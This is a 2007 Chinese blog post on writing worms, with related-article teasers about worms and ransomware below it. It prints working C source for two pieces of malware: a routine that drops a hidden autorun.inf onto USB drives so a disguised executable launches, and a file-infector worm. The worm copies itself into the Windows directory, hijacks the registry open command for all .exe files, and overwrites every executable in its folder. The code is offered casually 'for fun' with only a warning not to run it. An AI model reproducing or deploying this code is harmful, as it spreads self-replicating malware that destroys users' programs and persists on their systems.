一些蠕虫的写法。。

原创 2007年10月07日 15:33:00
下面是最常见的感染U盘的代码,很好理解,网上的代码,没有改。

void cfile(LPCTSTR drivers)
{
HANDLE hCFN;
char ch1[MAX_PATH];
DWORD filesize1 , wsize;
wsprintf(ch1,"%sautorun.inf",drivers);
char autorunc[]="[AutoRun] /n open=Recycled//notepad.exe /n ` /n shell//open=打开(&O)/nshell//open//Command=Recycled//notepad.exe /n shell//open//Default=1";
filesize1=sizeof(autorunc);
hCFN=CreateFile(ch1,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,NULL);
WriteFile(hCFN,autorunc,filesize1-1,&wsize,NULL);
SetFileAttributes(ch1,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
CloseHandle(hCFN);
}
还有这一段代码很有意思,作者貌似是俄罗斯人的一个新人,你可以在29A的论坛上找到这段代码,基本上就说明了如何自启动,但是没有做基本的除错和传播,还有他是暴力覆盖方法。。。类似前一阵子的小浩,编译了后不要随便运行。。。否则后果自负。
#include "windows.h"
#include "string.h"

int main(int argc, char *fuck[])
{
char windir[200];
char dropper[10]="//supa.exe";
char param1[4]=" %1";
char subkey[40]="exefile//shell//open//command";
HANDLE find_handle;
WIN32_FIND_DATA ff;
char msg1[200]="[ Worm Win32 -+w32.exe.IRC+- For The Mather Russia and Zaicev Dimon ]";

GetWindowsDirectoryA(windir,100);
lstrcatA(windir,dropper);
CopyFileA(fuck[0],windir,0);

lstrcatA(windir,param1);
RegOpenKeyA(HKEY_CLASSES_ROOT,subkey,0);
RegSetValueA(HKEY_CLASSES_ROOT,subkey,REG_SZ,windir,sizeof(windir));
RegCloseKey(HKEY_CLASSES_ROOT);

if (argc>1)
{
CopyFileA(fuck[0],fuck[1],0);
exit(0);
}

find_handle=FindFirstFileA("*.exe",&ff);
while (1)

{
CopyFileA(fuck[0],ff.cFileName,0);
if (!FindNextFileA(find_handle,&ff)) break;

}
FindClose(find_handle);
return (0);
}
 都没啥技术含量,权当一乐。

相关文章推荐

新型“蠕虫”勒索软件“wannacry”全球爆发态势及防火墙方式关闭445端口应对措施

北京时间2017年5月12日20时左右,全球爆发大规模勒索软件感染事件,目前的防御措施是关闭本机445端口。...

病毒、木马、蠕虫与恶意代码关键点

病毒:寄生存在,所谓寄生,就是病毒的指令存在于其它可执行程序的空指令部分。如下图为一个标准的计寄生形式的病毒: 运行可执行程序,一个jmp指令会导致程序跳转到病毒所在指令处开始执行,执行完毕之后...

病毒、蠕虫与木马之间有什么区别?

随着互联网的日益流行,各种病毒木马也猖厥起来,几乎每天都有新的病毒产生,大肆传播破坏,给广大互联网用户造成了极大的危害,几乎到了令人谈毒色变的地步。各种病毒,蠕虫,木马纷至沓来,令人防不胜防,苦恼无比...

wannacry蠕虫相关汇总知识

前两天wannacry席卷全球,在国内也引起了大量关注,国内安全厂商对此也进行了相关分析,于是趁此机会想记录一下相关知识,主要是汇总技术报告。 一、SMB远程攻击漏洞 北京时间2月...

常见异常流量及蠕虫案例

异常流量的数据包类型 1、TCP SYN flood(40字节)   11.*.64.3|2.*.38.180|64821|as10|5|4|1013|18|6|1|40|1   从NetF...
  • jack237
  • jack237
  • 2012年03月19日 23:22
  • 1663

世界杯”噱头蠕虫来袭,如何避免恶意攻击

近日,360安全中心发布安全警报称,大量网友反馈QQ群消息和QQ空间出现“世界杯阿根廷冷门.msi”、“急需订购的产品样品.msi”等可疑文件,经分析全部为QQ群蠕虫,它会篡改浏览器首页、流氓推广软件...

“飞客蠕虫”形成全球最大僵尸网络 每日感染数万网民

近期,为祸两年的“飞客蠕虫”病毒再次爆发,瑞星“云安全”系统显示,这种被称为MS08-067病毒(又名“飞客蠕虫”)的黑客程序正在在国内互联网上迅速扩散,每天感染数万网民。目前,我国用户感染量全球居首...
  • cometwo
  • cometwo
  • 2012年10月12日 15:51
  • 1534

(2014)七夕大爆发的安卓XX神奇蠕虫分析

Android短信蠕虫XXshenqi分析  余弦,在知道创宇黑客不神秘 0×00 今天从余弦大大微博上看到了这款Android短信蠕虫的信息,于是自己下载了一款研究,看到网上很多报告的...

web蠕虫编写过程

*导言      *自动化    *搜集目标 *绕过IDS,多态性和通讯        *结语      ===导言===                        ...

权威报告】WanaCrypt0r勒索蠕虫完全分析报告

0x1 前言 360互联网安全中心近日发现全球多个国家和地区的机构及个人电脑遭受到了一款新型勒索软件攻击,并于5月12日国内率先发布紧急预警,外媒和多家安全公司将该病毒命名为“WanaCry...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:一些蠕虫的写法。。
举报原因:
原因补充:

(最多只允许输入30个字)